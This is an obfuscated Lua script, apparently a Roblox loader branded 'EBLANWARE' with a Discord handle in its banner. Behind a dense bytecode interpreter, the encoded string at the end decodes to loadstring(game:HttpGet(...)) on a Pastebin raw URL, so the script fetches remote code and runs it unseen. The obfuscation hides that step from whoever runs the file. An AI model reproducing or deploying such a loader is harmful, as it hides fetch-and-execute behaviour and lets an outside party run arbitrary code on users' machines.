--[[
 _______   ________  ___       ________  ________   ___       __   ________  ________  _______      
|\  ___ \ |\   __  \|\  \     |\   __  \|\   ___  \|\  \     |\  \|\   __  \|\   __  \|\  ___ \     
\ \   __/|\ \  \|\ /\ \  \    \ \  \|\  \ \  \\ \  \ \  \    \ \  \ \  \|\  \ \  \|\  \ \   __/|    
 \ \  \_|/_\ \   __  \ \  \    \ \   __  \ \  \\ \  \ \  \  __\ \  \ \   __  \ \   _  _\ \  \_|/__  
  \ \  \_|\ \ \  \|\  \ \  \____\ \  \ \  \ \  \\ \  \ \  \|\__\_\  \ \  \ \  \ \  \\  \\ \  \_|\ \ 
   \ \_______\ \_______\ \_______\ \__\ \__\ \__\\ \__\ \____________\ \__\ \__\ \__\\ _\\ \_______\
    \|_______|\|_______|\|_______|\|__|\|__|\|__| \|__|\|____________|\|__|\|__|\|__|\|__|\|_______|
my discord: ebl4n812
]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v88=v2(v0(v30,16));if v19 then local v110=0;local v111;while true do if (v110==0) then v111=v5(v88,v19);v19=nil;v110=1;end if (v110==1) then return v111;end end else return v88;end end end);local function v20(v31,v32,v33) if v33 then local v89=0 -0 ;local v90;while true do if (v89==(0 -0)) then v90=(v31/((3 -1)^(v32-((2 -0) -1))))%((621 -(555 + (1129 -(68 + 997))))^(((v33-(932 -(857 + 74))) -(v32-(569 -(367 + 201)))) + (1271 -(226 + 1044)))) ;return v90-(v90%(928 -(214 + 713))) ;end end else local v91=0;local v92;while true do if (v91==((0 -0) + (117 -(32 + 85)))) then v92=(1 + 1)^(v32-((861 + 17) -(282 + 595))) ;return (((v31%(v92 + v92))>=v92) and (1638 -(1523 + 114))) or (0 + 0) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=0 + 0 ;local v36;local v37;while true do if (v35==(958 -(892 + 65))) then return (v37 * (610 -354)) + v36 ;end if (v35==0) then v36,v37=v1(v16,v18,v18 + (3 -1) );v18=v18 + (3 -(181 -(67 + 113))) ;v35=351 -(87 + 193 + 70) ;end end end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + 3 );v18=v18 + 4 ;return (v41 * (41190819 -24413603)) + (v40 * (48199 + 17337)) + (v39 * (1017 -761)) + v38 ;end local function v24() local v42=0 + 0 + 0 ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(952 -(802 + 150))) then v43=v23();v44=v23();v42=2 -1 ;end if (v42==3) then if (v47==(0 -0)) then if (v46==(1486 -((3435 -2437) + 488))) then return v48 * (0 + 0) ;else v47=1 + 0 ;v45=0 + (1747 -(760 + 987)) ;end elseif (v47==((4957 -(1789 + 124)) -(915 + 82))) then return ((v46==(0 -0)) and (v48 * ((1 + 0)/(0 -0)))) or (v48 * NaN) ;end return v8(v48,v47-1023 ) * (v45 + (v46/((7 -5)^(184 -132)))) ;end if (v42==(861 -(814 + 45))) then v47=v20(v44,1208 -(1069 + 118) ,70 -39 );v48=((v20(v44,69 -37 )==1) and  -((767 -(745 + 21)) + 0)) or ((1 + 0) -0) ;v42=3 + 0 ;end if (v42==(792 -(368 + 423))) then v45=3 -2 ;v46=(v20(v44,19 -(10 + 8) ,76 -56 ) * ((444 -(416 + 26))^((296 -188) -76))) + v43 ;v42=6 -4 ;end end end local function v25(v49) local v50=0 -0 ;local v51;local v52;while true do if (v50==(1 + 1)) then v52={};for v112=1, #v51 do v52[v112]=v2(v1(v3(v51,v112,v112)));end v50=3 + 0 ;end if (v50==((2888 -1833) -(87 + 968))) then v51=nil;if  not v49 then v49=v23();if (v49==(0 -0)) then return "";end end v50=1;end if (v50==(3 + 0)) then return v6(v52);end if (v50==(2 -1)) then v51=v3(v16,v18,(v18 + v49) -(1414 -(447 + 966)) );v18=v18 + v49 ;v50=1819 -(1703 + 114) ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return function(v93,v94,v95,v96,v97,v98,v99,v100,v101) local v102=(function() return 0;end)();local v93=(function() return;end)();local v94=(function() return;end)();while true do if (v102==(574 -(507 + 67))) then local v120=(function() return 0;end)();while true do if (v120==1) then v102=(function() return 1750 -(1013 + 736) ;end)();break;end if (v120==(0 + 0)) then v93=(function() return 0;end)();v94=(function() return nil;end)();v120=(function() return 2 -1 ;end)();end end end if ((3 -2)==v102) then local v121=(function() return 0;end)();while true do if (v121==(867 -(550 + 317))) then while true do if (v93==0) then v94=(function() return v95();end)();if (v96(v94, #":", #" ")~=0) then else local v136=(function() return 0 -0 ;end)();local v137=(function() return;end)();local v138=(function() return;end)();local v139=(function() return;end)();while true do if (v136==1) then v139=(function() return {v97(),v97(),nil,nil};end)();if (v137==0) then local v179=(function() return 0;end)();local v180=(function() return;end)();while true do if (v179==(0 -0)) then v180=(function() return 285 -(134 + 151) ;end)();while true do if (v180==(1665 -(970 + 695))) then v139[ #"-19"]=(function() return v97();end)();v139[ #"xnxx"]=(function() return v97();end)();break;end end break;end end elseif (v137== #"\\") then v139[ #"91("]=(function() return v98();end)();elseif (v137==(3 -1)) then v139[ #"asd"]=(function() return v98() -((1992 -(582 + 1408))^(55 -39)) ;end)();elseif (v137~= #"91(") then else local v190=(function() return 0 -0 ;end)();local v191=(function() return;end)();while true do if (v190==0) then v191=(function() return 0;end)();while true do if (0~=v191) then else v139[ #"-19"]=(function() return v98() -((7 -5)^(1840 -(1195 + 629))) ;end)();v139[ #".com"]=(function() return v97();end)();break;end end break;end end end v136=(function() return 2 -0 ;end)();end if (v136==0) then local v173=(function() return 241 -(187 + 54) ;end)();while true do if (v173==(780 -(162 + 618))) then v137=(function() return v96(v94,2, #"xnx");end)();v138=(function() return v96(v94, #"asd1",5 + 1 );end)();v173=(function() return 1;end)();end if (v173~=1) then else v136=(function() return 1;end)();break;end end end if (v136==(2 + 1)) then if (v96(v138, #"gha", #"gha")== #"/") then v139[ #"asd1"]=(function() return v99[v139[ #".com"]];end)();end v100[v101]=(function() return v139;end)();break;end if (v136~=(3 -1)) then else if (v96(v138, #",", #"<")~= #".") then else v139[2 -0 ]=(function() return v99[v139[1 + 1 ]];end)();end if (v96(v138,1638 -(1373 + 263) ,1002 -(451 + 549) )~= #"/") then else v139[ #"xnx"]=(function() return v99[v139[ #"nil"]];end)();end v136=(function() return 1 + 2 ;end)();end end end break;end end return v93,v94,v95,v96,v97,v98,v99,v100,v101;end end end end end;end)();local v54=(function() return function(v103,v104,v105) local v106=(function() return 0 -0 ;end)();local v107=(function() return;end)();while true do if (0==v106) then v107=(function() return 0 -0 ;end)();while true do if (v107==0) then local v124=(function() return 0;end)();local v125=(function() return;end)();while true do if (v124~=(1384 -(746 + 638))) then else v125=(function() return 0 + 0 ;end)();while true do if (v125==0) then local v164=(function() return 0 -0 ;end)();while true do if (v164~=0) then else v103[v104-#"]" ]=(function() return v105();end)();return v103,v104,v105;end end end end break;end end end end break;end end end;end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {};end)();local v58=(function() return {v55,v56,nil,v57};end)();local v59=(function() return v23();end)();local v60=(function() return {};end)();for v68= #"<",v59 do local v69=(function() return 0;end)();local v70=(function() return;end)();local v71=(function() return;end)();while true do if (v69==0) then local v114=(function() return 1581 -(1535 + 46) ;end)();while true do if (v114~=(1 + 0)) then else v69=(function() return 1;end)();break;end if (v114==0) then v70=(function() return v21();end)();v71=(function() return nil;end)();v114=(function() return 1 + 0 ;end)();end end end if (1==v69) then if (v70== #".") then v71=(function() return v21()~=0 ;end)();elseif (v70==(562 -(306 + 254))) then v71=(function() return v24();end)();elseif (v70~= #"gha") then else v71=(function() return v25();end)();end v60[v68]=(function() return v71;end)();break;end end end v58[ #"xnx"]=(function() return v21();end)();for v72= #"|",v23() do FlatIdent_51F42,Descriptor,v21,v20,v22,v23,v60,v55,v72=(function() return v53(FlatIdent_51F42,Descriptor,v21,v20,v22,v23,v60,v55,v72);end)();end for v73= #",",v23() do v56,v73,v28=(function() return v54(v56,v73,v28);end)();end return v58;end local function v29(v62,v63,v64) local v65=v62[1];local v66=v62[1 + 1 ];local v67=v62[5 -2 ];return function(...) local v74=v65;local v75=v66;local v76=v67;local v77=v27;local v78=(1881 -(15 + 398)) -(899 + 568) ;local v79= -(1 + 0);local v80={};local v81={...};local v82=v12("#",...) -(604 -(268 + 335)) ;local v83={};local v84={};for v108=290 -(60 + 230) ,v82 do if ((1853<4813) and (v108>=v76)) then v80[v108-v76 ]=v81[v108 + (573 -(426 + (1128 -(18 + 964)))) ];else v84[v108]=v81[v108 + 1 + 0 ];end end local v85=(v82-v76) + (1457 -(282 + 1174)) ;local v86;local v87;while true do local v109=811 -(569 + 242) ;while true do if ((1==v109) or (2821<2431)) then if (v87<=((30 -22) -5)) then if (v87<=(1 + 0)) then if (v87>(0 + 0)) then v84[v86[2]]=v64[v86[1027 -(706 + 318) ]];else local v128=1251 -(721 + 530) ;local v129;local v130;while true do if (v128==(1272 -(945 + 326))) then v84[v129 + (2 -(1 + 0)) ]=v130;v84[v129]=v130[v86[4 + 0 ]];break;end if ((v128==(700 -(271 + 429))) or (2874<2181)) then v129=v86[2 + 0 ];v130=v84[v86[(2353 -(20 + 830)) -(1408 + 92) ]];v128=1087 -(461 + 625) ;end end end elseif (v87==(1290 -(993 + 295))) then do return;end else v84[v86[1 + 1 ]]();end elseif ((v87<=(1176 -(418 + 588 + 165))) or (2689<=343)) then if (v87>(2 + 2)) then v84[v86[1 + 1 ]]={};else v84[v86[1 + 1 ]]=v86[3];end elseif (v87<=(2 + (130 -(116 + 10)))) then local v134=v86[531 -(406 + 123) ];v84[v134]=v84[v134](v13(v84,v134 + (1770 -(1749 + 20)) ,v79));elseif (v87==(2 + 5)) then local v140=1322 -(1249 + 73) ;local v141;local v142;local v143;local v144;while true do if ((v140==2) or (1869==2009)) then for v177=v141,v79 do local v178=0 + 0 ;while true do if ((v178==(1145 -(35 + 431 + 679))) or (3546<2322)) then v144=v144 + (2 -1) ;v84[v177]=v142[v144];break;end end end break;end if ((v140==(2 -1)) or (2082==4773)) then v79=(v143 + v141) -(1901 -(106 + 1794)) ;v144=0;v140=1 + 1 ;end if (v140==((738 -(542 + 196)) + 0)) then v141=v86[(10 -5) -(1 + 2) ];v142,v143=v77(v84[v141](v13(v84,v141 + 1 ,v86[2 + 1 ])));v140=2 -1 ;end end else local v145;local v146,v147;local v148;local v149;v84[v86[1 + 1 ]]={};v78=v78 + 1 ;v86=v74[v78];v84[v86[2]]=v64[v86[117 -((10 -6) + (282 -172)) ]];v78=v78 + (585 -(57 + 527)) ;v86=v74[v78];v84[v86[2]]=v64[v86[(2981 -(1126 + 425)) -((446 -(118 + 287)) + 1386) ]];v78=v78 + (104 -(17 + 86)) ;v86=v74[v78];v149=v86[2 + 0 ];v148=v84[v86[6 -3 ]];v84[v149 + 1 ]=v148;v84[v149]=v148[v86[4]];v78=v78 + (2 -1) ;v86=v74[v78];v84[v86[168 -(122 + 44) ]]=v86[3];v78=v78 + (1 -(0 -0)) ;v86=v74[v78];v149=v86[6 -4 ];v146,v147=v77(v84[v149](v13(v84,v149 + 1 + 0 ,v86[1 + (1123 -(118 + 1003)) ])));v79=(v147 + v149) -1 ;v145=0 -0 ;for v170=v149,v79 do v145=v145 + 1 ;v84[v170]=v146[v145];end v78=v78 + (66 -(30 + 35)) ;v86=v74[v78];v149=v86[2 + (0 -0) ];v84[v149]=v84[v149](v13(v84,v149 + 1 ,v79));v78=v78 + (1258 -(1043 + 214)) ;v86=v74[v78];v84[v86[7 -5 ]]();v78=v78 + (1213 -(323 + 889)) ;v86=v74[v78];do return;end end v78=v78 + (2 -1) ;break;end if ((3244>1055) and (v109==(580 -(361 + 219)))) then v86=v74[v78];v87=v86[321 -(53 + 267) ];v109=1 + 0 ;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403213Q00682Q7470733A2Q2F706173746562696E2E636F6D2F7261772F42726B4D52515A4B00094Q00087Q00122Q000100013Q00122Q000200023Q00202Q00020002000300122Q000400046Q000200046Q00013Q00024Q0001000100016Q00017Q00",v9(),...);
